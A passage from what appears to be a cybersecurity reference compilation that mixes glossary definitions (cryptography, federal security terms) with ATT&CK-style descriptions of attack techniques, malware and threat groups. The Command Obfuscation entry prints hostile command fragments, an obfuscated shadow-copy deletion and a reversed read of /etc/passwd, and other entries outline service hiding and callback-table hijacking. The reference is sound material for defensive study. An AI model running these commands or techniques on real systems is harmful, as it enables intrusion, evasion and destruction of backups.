Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via Native API functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as `PnPUtil.exe`. Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution.

To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., Hide Artifacts), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.

Term: Checklist
Definition: An organized collection of rules about a particular kind of system or platform.

Term: CISO
Definition: See Senior Agency Information Security Officer

Term: Internet Engineering Task Force (IETF)
Definition: The internet standards organization made up of network designers, operators, vendors, and researchers that defines protocol standards (e.g., IP, TCP, DNS) through process of collaboration and consensus.

Term: asset identification
Definition: The attributes and methods necessary for uniquely identifying a given asset. A full explanation of asset identification is provided in [NISTIR 7693].

Term: design
Definition: Process to define the architecture, system elements, interfaces, and other characteristics of a system or system element.

Term: mechanism
Definition: A process or system that is used to produce a particular result. 
The fundamental processes involved in or responsible for an action, reaction, or other natural phenomenon. 
A natural or established process by which something takes place or is brought about. 
Refer to security mechanism. 
Note: A mechanism can be technology- or nontechnology-based (e.g., apparatus, device, instrument, procedure, process, system, operation, method, technique, means, or medium).

Term: Specialized Security-Limited Functionality (SSLF) Environment
Definition: A Custom environment that is highly restrictive and secure; it is usually reserved for systems that have the highest threats and associated impacts.

Term: information steward
Definition: Individual or group that helps to ensure the careful and responsible management of federal information belonging to the Nation as a whole, regardless of the entity or source that may have originated, created, or compiled the information. Information stewards provide maximum access to federal information to elements of the federal government and its customers, balanced by the obligation to protect the information in accordance with the provisions of FISMA and any associated security-related federal policies, directives, regulations, standards, and guidance.

Term: ICS
Definition: An information system used to control industrial processes such as manufacturing, product handling, production, and distribution. Industrial control systems include supervisory control and data acquisition systems used to control geographically dispersed assets, as well as distributed control systems and smaller control systems using programmable logic controllers to control localized processes.

Term: authentication protocol
Definition: 1. A well specified message exchange process between a claimant and a verifier that enables the verifier to confirm the claimant’s identity.

Name: BUSHWALK
Type: malware
Description: BUSHWALK is a web shell written in Perl that was inserted into the legitimate querymanifest.cgi file on compromised Ivanti Connect Secure VPNs during Cutting Edge.

Term: Cyber Attack
Definition: An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.

Term: ECC
Definition: Elliptic Curve Cryptography, the public-key cryptographic methods using operations in an elliptic curve group.

Term: common carrier
Definition: A telecommunications company that holds itself out to the public for hire to provide communications transmission services.

Term: Information System User
Definition: A consumer of the services offered by an RP.

Term: hash function
Definition: <p>A function on bit strings in which the length of the output is fixed. <strong>Approved</strong> hash functions (such as those specified in FIPS 180 and FIPS 202) are designed to satisfy the following properties:</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Term: Operational phase
Definition: A phase in the lifecycle of keying material whereby keying material is used for standard cryptographic purposes.

Term: records
Definition: The recordings (automated and manual) of evidence of activities performed or results achieved (e.g., forms, reports, test results), which serve as a basis for verifying that the organization and system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain the complete set of information on particular items).

Term: federal agency
Definition: An executive Department specified in 5 U.S.C., Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned Government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Term: EDGE
Definition: An upgrade to GPRS to provide higher data rates by joining multiple time slots.

Name: Doki
Type: malware
Description: Doki is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. Doki was used in conjunction with the ngrok Mining Botnet in a campaign that targeted Docker servers in cloud platforms.

Term: access type
Definition: Privilege to perform action on an object. Read, write, execute, append, modify, delete, and create are examples of access types.

Term: application allowlisting
Definition: A list of applications and application components (libraries, configuration files, etc.) that are authorized to be present or active on a host according to a well-defined baseline.

Term: CIO
Definition: Agency official responsible for: 
(i) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency; 
(ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and 
(iii) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.

Term: <em>(p, q, d)</em>
Definition: RSA private key in the prime-factor format.

Term: Deny by Default
Definition: To block all inbound and outbound traffic that has not been expressly permitted by firewall policy.

Term: negligible
Definition: Extremely small. Typically quantifies the probability of an undesirable event that might occur during the lifetime of a cryptosystem (including during attacks by computationally bounded adversaries).

Name: Search Victim-Owned Websites
Type: attack-pattern
Description: Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Trusted Relationship or Phishing).

In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as Wordlist Scanning, as well as by leveraging files such as sitemap.xml and robots.txt.

Term: application-layer onboarding
Definition: Consists of the steps required to provide an IoT device with the application-layer components (e.g., applications, updates, configurations) that it needs to execute its application and thereby perform as expected. Application-layer onboarding is analogous to network-layer onboarding; it occurs at the application layer rather than at the network layer.

Term: superuser
Definition: A user that is authorized (and therefore, trusted) to have access to perform system control, monitoring, administration functions, or security-relevant functions that ordinary users are not authorized to perform.

Term: Association
Definition: A relationship for a particular purpose. For example, a key is associated with the application or process for which it will be used.

Term: Platform
Definition: In the context of the CPE Applicability Language specification only, a logical structure combining one or more bound CPE names through logical operators.

Term: Major Revision
Definition: Any increase in the version of an SCAP component’s specification or SCAP related data set that involves substantive changes that will break backwards compatibility with previous releases.

Term: File Name Anomaly
Definition: A mismatch between the internal file header and it external extension; a file name inconsistent with the content of the file (e.g., renaming a graphics file with a non-graphics extension).

Term: Event Correlation
Definition: See “Event Correlation”.

Term: Asset Identification Element
Definition: A complete, bound expression of an asset identification using the constructs defined in this specification.

Term: Sponsor (of a certificate)
Definition: A human entity that is responsible for managing a certificate for the non-human entity identified as the subject in the certificate (e.g., applying for the certificate; generating the key pair; replacing the certificate, when required; and revoking the certificate). Note that a certificate sponsor is also a sponsor of the public key in the certificate and the corresponding private key.

Term: service authority
Definition: The COMSEC Service Authority is the Department/Agency (D/A) senior staff component/command level element that provides staff supervision and oversight of COMSEC operations, policies, procedures, accounting, resource management, material acquisition, and training throughout the D/A. The multitude of responsibilities inherent to the COMSEC Service Authority functions may be allocated to one or more senior staff elements, while specific oversight and execution of selected functional responsibilities may be delegated to subordinate field agencies and activities.

Term: Personal Firewall Appliance
Definition: A device that performs functions similar to a personal firewall for a group of computers on a home network.

Term: <em>H0</em>
Definition: The null hypothesis; i.e., the statement that the sequence is random.

Term: Specialized Security-Limited Functionality (SSLF) Environment
Definition: Custom environment encompassing systems with specialized security requirements, in which higher security needs typically result in more limited functionality.

Term: Cybersecurity and/or Privacy Learning Program manager
Definition: The person or people in the organization responsible for the development, procurement, integration, modification, operation, maintenance, or final disposition of the elements of the cybersecurity and/or privacy (CPLP) learning programs. In some organizations, there will be multiple iterations of learning programs in which cybersecurity and privacy are managed separately.

Name: Modify or Spoof Tool UI
Type: attack-pattern
Description: Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. 

Adversaries may present misleading or falsified security tool interfaces (UIs) that display normal or healthy status indicators, even when underlying security tools have been disabled, degraded, or otherwise tampered with. Security tools typically provide visibility into system health, alerting, and operational status; by misrepresenting this information, adversaries can undermine defender trust in these signals and obscure the true security posture of the system. 

This behavior is often used in conjunction with efforts to disable or modify tools, where adversaries first impair the functionality of defenses (e.g., EDR, logging agents) and then replace or mimic their interfaces to conceal the loss of visibility. By maintaining the appearance of normal operations, such as showing active protection, successful updates, or absence of threats, adversaries can delay investigation and response, enabling continued malicious activity. 

For example, adversaries may display a fake Windows Security interface or system tray icon indicating a “protected” or “healthy” state after disabling Windows Defender or related services.

Name: MobileOrder
Type: malware
Description: MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic.

Term: Manage Privileges
Definition: An ISCM capability that ensures that people have the privileges necessary (and only those necessary) to perform their duties, to limit access to that which is necessary.

Term: lagging indicator
Definition: A metric that tracks the outcome of events or trends.

Name: Container API
Type: attack-pattern
Description: Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment. An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

Term: Rollup
Definition: A scheme that enables the off-chain processing of transactions by one or more operators with on-chain state update commitments that contain “compressed” per-transaction data.

Term: <em>HMAC-hash</em>
Definition: The HMAC algorithm using the hash function, HASH (e.g., HASHcould be SHA-1). See FIPS 198-1 for the specification of the HMAC algorithm using one of the approved hash functions.

Term: Tag
Definition: A cryptographic checksum on data that is designed to reveal both accidental errors and the intentional modification of the data whose computation and verification require knowledge of a secret key.

Term: valid length
Definition: A length for a plaintext or ciphertext input that is allowed for an implementation of the authenticated-encryption function or the authenticated-decryption function.

Name: StrongPity
Type: malware
Description: StrongPity is an information stealing malware used by PROMETHIUM.

Term: Key-agreement transaction
Definition: An execution of a key-agreement scheme.

Term: <em>Oj</em>
Definition: The jth output block.

Term: POA&M
Definition: A document that identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones in meeting the tasks, and scheduled completion dates for the milestones.

Term: security incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Term: information system component
Definition: An element of a large system—such as an identity card, issuer, card reader, or identity verification support—within the PIV system.

Term: salt
Definition: A byte string that is used as an input in the randomness extraction step specified in Section 5.

Term: Zero-Knowledge Proof
Definition: A cryptographic scheme where a prover is able to convince a verifier that a statement is true, without providing any more information than that single bit (that is, that the statement is true rather than false).

Name: TrickBot
Type: malware
Description: TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.

Term: Federal Desktop Core Configuration (FDCC)
Definition: OMB-mandated set of security configurations for all federal workstation and laptop devices that run either Windows XP or Vista.

Name: Pillowmint
Type: malware
Description: Pillowmint is a point-of-sale malware used by FIN7 designed to capture credit card information.

Name: ISMInjector
Type: malware
Description: ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent.

Name: Command Obfuscation
Type: attack-pattern
Description: Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., Phishing and Drive-by Compromise) or interactively via Command and Scripting Interpreter.

For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality. Many languages support built-in obfuscation in the form of base64 or URL encoding. Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.

Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).

Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.

Term: <em>Markov model</em>
Definition: A model for a probability distribution where the probability that the ith element of a sequence has a given value depends only on the values of the previous n elements of the sequence. The model is called an nth order Markov model.

Term: trust anchor
Definition: An established point of trust (usually based on the authority of some person, office, or organization) from which an entity begins the validation of an authorized process or authorized (signed) package. A "trust anchor" is sometimes defined as just a public key used for different purposes (e.g., validating a certification authority (CA), validating a signed software package or key, validating the process (or person) loading the signed software or key).

Term: Targeted security strength
Definition: The desired security strength for a cryptographic application. The target security strength is selected based upon the amount of security desired for the information protected by the keying material established using this Recommendation.

Term: GCM
Definition: Galois/Counter Mode

Term: clear
Definition: A method of sanitization that applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple, non-invasive data recovery techniques using the same interface that is available to the user. Typically applied through the standard read and write commands to the storage device, such as by rewriting with a new value or using a menu option to reset the device to the factory state, where rewriting is not supported.

Term: impact value
Definition: The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability.

Term: Modular Contracting
Definition: Under modular contracting, an executive agency’s need for a system is satisfied in successive acquisitions of interoperable increments. Each increment complies with common or commercially accepted standards applicable to information technology so that the increments are compatible with other increments of information technology comprising the system.

Name: PLATINUM
Type: intrusion-set
Description: PLATINUM is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia.

Name: SoreFang
Type: malware
Description: SoreFang is first stage downloader used by APT29 for exfiltration and to load other malware.

Term: Log Normalization
Definition: See “Log Normalization”.

Term: Key derivation
Definition: A process that derives new keying material from a key (i.e., a key-derivation key) that is currently available.

Name: KernelCallbackTable
Type: attack-pattern
Description: Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads. The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.

An adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as Reflective Code Loading or Process Injection into another process.

A pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> Native API function). Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.

The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload. Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.

Term: account linking
Definition: The association of multiple federated identifiers with a single RP subscriber account or the management of those associations.

Name: Msiexec
Type: attack-pattern
Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.

Term: Author
Definition: The organization responsible for creating the checklist in its current format. In most cases an organization will represent both the author and authority of a checklist, but this is not always true. For example, if an organization produces validated SCAP content for a NIST publication, the organization that created the SCAP content will be listed as the Author, but NIST will remain the Authority.

Term: Controlled Variable
Definition: The variable that the control system attempts to keep at the set point value. The set point may be constant or variable.

Term: non-repudiation
Definition: Protection against an individual who falsely denies having performed a certain action and provides the capability to determine whether an individual took a certain action, such as creating information, sending a message, approving information, or receiving a message.

Term: <em>Dataset</em>
Definition: A collection of data.

Term: security requirement
Definition: Requirements levied on an information system that are derived from laws, executive orders, directives, policies, instructions, regulations, or organizational (mission) needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.

Term: breakdown structure
Definition: Framework for efficiently controlling some aspect of the activities for a program or project.

Term: differential privacy
Definition: A rigorous mathematical definition of disclosure that considers the risk that an individual's confidential data may be learned as a result of a mathematical analysis based on that data being made publicly available.

Term: coercivity
Definition: A measure of the ability of a ferromagnetic material to withstand an external magnetic field without becoming demagnetized.

Term: Store a key or metadata
Definition: Placing a key and/or metadata in storage outside of a cryptographic module without retaining the original copy in the cryptographic module.

Term: key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce the operation, while an entity without knowledge of the key cannot. Examples of the use of a key that are applicable to this Recommendation include: 1. The computation of a digital signature from data, and 2. The verification of a digital signature.

Term: information system component
Definition: A hardware, software, firmware part or element of a larger PNT system with well-defined inputs and outputs and a specific function.

Term: Subject Alternative Name
Definition: A field in an X.509 certificate that identifies one or more fully qualified domain names, IP addresses, email addresses, URIs, or UPNs to be associated with the public key contained in a certificate.

Term: Operating system virtualization
Definition: A virtual implementation of the operating system interface that can be used to run applications written for the same operating system.

Name: BITTER
Type: intrusion-set
Description: BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.

Term: Least common multiple
Definition: The smallest positive integer that is divisible by two or more positive integers without a remainder. For example, the least common multiple of 2 and 3 is 6.

Name: C0032
Type: campaign
Description: C0032 was an extended campaign suspected to involve the Triton adversaries with related capabilities and techniques focused on gaining a foothold within IT environments. This campaign occurred in 2019 and was distinctly different from the Triton Safety Instrumented System Attack.

Term: ZTA
Definition: An enterprise’s cybersecurity plan that utilizes zero trust concepts and encompasses component relationships, workflow planning, and access policies. Therefore, a zero trust enterprise is the network infrastructure (physical and virtual) and operational policies that are in place for an enterprise as a product of a zero trust architecture plan.

Term: key establishment
Definition: The procedure that results in keying material that is shared among different entities.

Name: ROADTools
Type: tool
Description: ROADTools is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.

Term: service
Definition: A set of related IT components provided in support of one or more business processes.

Term: personnel security
Definition: The discipline of assessing the conduct, integrity, judgment, loyalty, reliability, and stability of individuals for duties and responsibilities that require trustworthiness.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides the services of: 1. Source/entity authentication, 2. Data integrity authentication, and/or 3. Support for signer non-redudiation.

Name: Disable Crypto Hardware
Type: attack-pattern
Description: Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of Modify System Image, forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., Reduce Key Space).

Name: Vasport
Type: malware
Description: Vasport is a trojan used by Elderwood to open a backdoor on compromised hosts.

Term: authorize processing
Definition: Access privileges granted to a user, program, or process or the act of granting those privileges. Formerly known as "accreditation."

Term: identity proofing
Definition: Verifying the claimed identity of an applicant by authenticating the identity source documents provided by the applicant.

Name: Tor
Type: tool
Description: Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination.

Term: digital transaction
Definition: A discrete event between a user and a system that supports a business or programmatic purpose.
A government digital system may have multiple categories or types of transactions, which may require separate analysis within the overall digital identity risk assessment.

Term: Target Residual Risk
Definition: The amount of risk that an entity prefers to assume in the pursuit of its strategy and business objectives, knowing that management will implement, or has implemented, direct or focused actions to alter the severity of the risk.

Term: Informative Reference Developer
Definition: A person, team, or organization that creates an OLIR and submits it to the National OLIR Program.

Name: Uroburos
Type: malware
Description: Uroburos is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the Turla toolset to collect intelligence on sensitive targets worldwide. Uroburos has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. Uroburos is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. Uroburos has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.

Term: Blockchain Subnetwork
Definition: A blockchain network that is tightly coupled with one or more other blockchain networks, as found in sharding.

Term: boundary
Definition: See also authorization boundary and interface.

Term: replay resistance
Definition: Protection against the capture of transmitted authentication or access control information and its subsequent retransmission with the intent of producing an unauthorized effect or gaining unauthorized access.

Term: Byte String
Definition: An ordered sequence of bytes, beginning with the most significant (leftmost) byte and ending with the least significant (rightmost) byte. Any bit string whose bit length is a multiple of eight can be viewed as the concatenation of an ordered sequence of bytes (i.e., a byte string). For example, the bit string 0110010101000011 can be viewed as a byte string since it is the concatenation of two bytes: 01100101 followed by 01000011.

Term: Block header
Definition: The portion of a block that contains information about the block itself (block metadata), typically including a timestamp, a hash representation of the block data, the hash of the previous block’s header, and a cryptographic nonce (if needed).

Term: Threat Assessment/Analysis
Definition: Assessment to evaluate the actual or potential effect of a threat to a system. 
Note: The threat assessment may include identifying and describing the nature of the threat.

Term: Option ROM
Definition: Firmware that is called by the system BIOS. Option ROMs include BIOS firmware on add-on cards (e.g., video card, hard drive controller, network card) as well as modules which extend the capabilities of the system BIOS.

Term: Transforming Application
Definition: An application that transforms a CBEFF Basic Data Structure from one Patron Format into another Patron Format. This can include processing of the content of the BDB, but need not. CBEFF defines rules for migrat­ ing the values in Standard Biometric Header fields.

Term: I1, …, I64
Definition: Bits of the Input Block

Term: Log Preservation
Definition: Keeping logs that normally would be discarded, because they contain records of activity of particular interest.

Name: Fileless Storage
Type: attack-pattern
Description: Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository. Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk..

Similar to fileless in-memory behaviors such as Reflective Code Loading and Process Injection, fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.

Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of Persistence) and collected data not yet exfiltrated from the victim (e.g., Local Data Staging). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. 

Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.

Term: MA
Definition: Any act that either prevents the failure or malfunction of IoT device and supporting equipment or restores its operating capability.

Name: Web Service
Type: attack-pattern
Description: Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

Term: security categorization
Definition: The process of determining the security category for information or a system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems. See security category.

Term: system component
Definition: A hardware, software, firmware part or element of a larger PNT system with well-defined inputs and outputs and a specific function.

Name: DragonOK
Type: intrusion-set
Description: DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.

Term: criticality
Definition: A measure of the degree to which an organization depends on the information or information system for the success of a mission or of a business function.

Name: DarkTortilla
Type: malware
Description: DarkTortilla is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. DarkTortilla has been used to deliver popular information stealers, RATs, and payloads such as Agent Tesla, AsyncRat, NanoCore, RedLine, Cobalt Strike, and Metasploit.

Name: Mispadu
Type: malware
Description: Mispadu is a banking trojan written in Delphi that was first observed in 2019 and uses a Malware-as-a-Service (MaaS) business model. This malware is operated, managed, and sold by the Malteiro cybercriminal group. Mispadu has mainly been used to target victims in Brazil and Mexico, and has also had confirmed operations throughout Latin America and Europe.

Term: Directory
Definition: Organizational structures that are used to group files together.

Name: BlackEnergy
Type: malware
Description: BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3.

Term: IoT Product
Definition: An IoT device or IoT devices and any additional product components (e.g., backend, mobile app) that are necessary to use the IoT device beyond basic operational features.

Term: process
Definition: Set of interrelated or interacting activities which transforms inputs into outputs. 
A program in execution.

Term: validation model
Definition: The synthetic data user is provided with some statistics computed directly on the confidential data using the same statistical formulas that were applied to the synthetic data.

Term: Physical partitioning
Definition: The hypervisor assigning separate physical resources to each guest OS.

Name: Rover
Type: malware
Description: Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan.

Term: Examination
Definition: The second phase of the computer and network forensics process, which involves forensically processing large amounts of collected data using a combination of automated and manual methods to assess and extract data of particular interest, while preserving the integrity of the data.

Name: Exfiltration Over Unencrypted Non-C2 Protocol
Type: attack-pattern
Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

Term: Secure Multipurpose Internet Mail Extensions (S/MIME)
Definition: A set of specifications for securing electronic mail. S/MIME is based upon the widely used MIME standard and describes a protocol for adding cryptographic security services through MIME encapsulation of digitally signed and encrypted objects. The basic security services offered by S/MIME are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).

Name: C0015
Type: campaign
Description: C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.

Term: Multiple-center group
Definition: As used in this Recommendation, a set of two or more key centers that have agreed to work together to provide cryptographic keying services to their subscribers.

Term: <em>TTA_supplied_info</em>
Definition: Additional information that is included in the timestamped_data by a TTA during the generation of a timestamp_signature.

Term: categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS PUB 199 for other than national security systems. See security category.

Name: Group5
Type: intrusion-set
Description: Group5 is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. Group5 has used two commonly available remote access tools (RATs), njRAT and NanoCore, as well as an Android RAT, DroidJack.

Term: Word
Definition: A predefined substring consisting of a fixed pattern/template (e.g., 010,  0110).

Term: architecture
Definition: A highly structured specification of an acceptable approach within a framework for solving a specific problem. An architecture contains descriptions of all the components of a selected, acceptable solution, while allowing certain details of specific components to be variable to satisfy related constraints (e.g., costs, local environment, user acceptability).

Term: Mobile Subscriber Integrated Services Digital Network (MSISDN)
Definition: The international telephone number assigned to a cellular subscriber.

Term: System Flash Memory
Definition: The non-volatile storage location of system BIOS, typically in electronically erasable programmable read-only memory (EEPROM) flash memory on the motherboard. While system flash memory is a technology-specific term, guidelines in this document referring to the system flash memory are intended to apply to any non-volatile storage medium containing the system BIOS.

Term: cooperative remote rekeying
Definition: Synonymous with manual remote rekeying.

Term: Security Authorization
Definition: The process of initially establishing access privileges of an individual and subse­quently verifying the acceptability of a request for access.

Term: split tunneling
Definition: The process of allowing a remote user or device to establish a non-remote connection with a system and simultaneously communicate via some other connection to a resource in an external network. This method of network access enables a user to access remote devices, and simultaneously, access uncontrolled networks.

Term: encryption
Definition: The process of changing plaintext into ciphertext using a cryptographic algorithm and key.

Term: control baseline
